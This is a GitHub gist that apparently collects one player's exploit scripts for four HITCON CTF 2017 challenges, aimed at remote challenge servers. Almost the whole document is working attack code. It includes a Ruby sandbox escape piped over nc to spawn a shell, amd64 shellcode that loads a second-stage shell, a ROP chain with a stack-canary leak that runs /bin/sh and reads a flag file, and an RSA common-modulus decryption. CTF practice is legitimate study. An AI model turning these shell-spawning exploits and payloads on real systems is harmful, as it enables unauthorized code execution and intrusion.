Skip to content

Instantly share code, notes, and snippets.

@cubarco

cubarco/1_hitcon_ctf_2017_exps

Last active October 12, 2019 19:57
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
HITCON CTF 2017
Raw
1_hitcon_ctf_2017_exps
Start, Easy To Say, Baby Ruby Escaping, Secret FS
Raw
baby_ruby_escaping.sh
#!/usr/bin/env bash
(
echo "TracePoint.trace(:c_call) do system('sh') end"
echo "cat thanks_readline_for_completing_the_name_of_flag"
cat
) | nc 52.192.198.197 50216
Raw
easy_to_say.py
#!/usr/bin/env python
# coding=utf8
from pwn import remote, shellcraft, asm, context
from time import sleep
context.arch = 'amd64'
p = remote('52.69.40.204', 8361)
shellcode = '''
add r9w, 0x8285
mov dl, 100
lea rsi, [rip - 0x010503]
loop:
add rsi, r9
xor eax, eax
syscall
jmp loop
'''
payload = asm(shellcode)
p.send(payload)
sleep(0.5)
p.sendline(asm(shellcraft.amd64.linux.sh()))
p.interactive()
Raw
secret_fs.py
#!/usr/bin/env python
# coding=utf8
from pwn import remote
from time import sleep
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return (x+m) % m
# fetch N
p = remote('13.112.220.64', 9999)
p.recvuntil('N: ')
N = int(p.recvline()[:-1])
print '[*] N: ' + str(N)
# fetch c1
p.sendline('flag')
p.recvuntil('Result: ')
c1 = int(p.recvline()[:-1])
print '[*] c1: ' + str(c1)
# *magic*
p.send('a' * 13)
sleep(0.5)
p.send('a' * 15)
sleep(0.5)
# fetch c2
p.sendline('flag')
p.recvuntil('Result: ')
c2 = int(p.recvline()[:-1])
print '[*] c2: ' + str(c2)
# the pwn part has done, now the math work
# See: https://crypto.stackexchange.com/questions/1614/rsa-cracking-the-same-message-is-sent-to-two-different-people-problem
# e1 = 3
# e2 = 0x74 # 116
a = 39
# b = -1
c2_inv = modinv(c2, N)
print '[*] c2_inv: ' + str(c2_inv)
m = c1 ** a * c2_inv % N
print '[*] flag: ' + ("%x" % m).decode('hex').splitlines()[0]
Raw
start.py
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
from roputils import ROP
rop = ROP('./start')
p = remote('54.65.72.116', 31337)
bss = 0x6CF3C0
read_addr = 0x440300
pop_rax_rdx_rbx_ret = 0x47a6e6
pop_rdi_ret = 0x47a6e6
pop_rsi_ret = 0x47a6e6
pop_rdx_ret = 0x47a6e6
syscall = 0x47a6e6
payload = rop.fill(8) + \
rop.call(read_addr, 0, bss, 10) + \
p64(pop_rax_rdx_rbx_ret) + p64(59) + p64(0) + p64(0) + \
rop.p([rop.gadget('pop', 'rdi'), bss]) + \
rop.p([rop.gadget('pop', 'rsi'), 0]) + \
rop.p([rop.gadget('pop', 'rdx'), 0]) + \
rop.p([rop.gadget('syscall')])
exp_rb = r'''payload = "%s"
z = Sock.new '127.0.0.1', 31338
z.write 'a' * 24 + "\n"
z.recvuntil 'a' * 24 + "\n"
canary = u64(z.recv(7).rjust(8, "\0"))
puts "[*] canary: 0x" + canary.to_s(16)
z.write 'a' * 24 + p64(canary) + [payload].pack('H*')
sleep(0.1)
z.write "exit\n"
z.write("/bin/sh\0")
sleep(0.1)
z.write("cat /home/start/flag\n")
z.recvuntil('a' * 24 + "\n")
puts "[*] flag: " + z.recvline()''' % payload.encode('hex')
exp_rb = exp_rb.replace('\n', ';')
p.sendline(exp_rb)
p.recvuntil('> ')
print p.recvall(timeout=1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment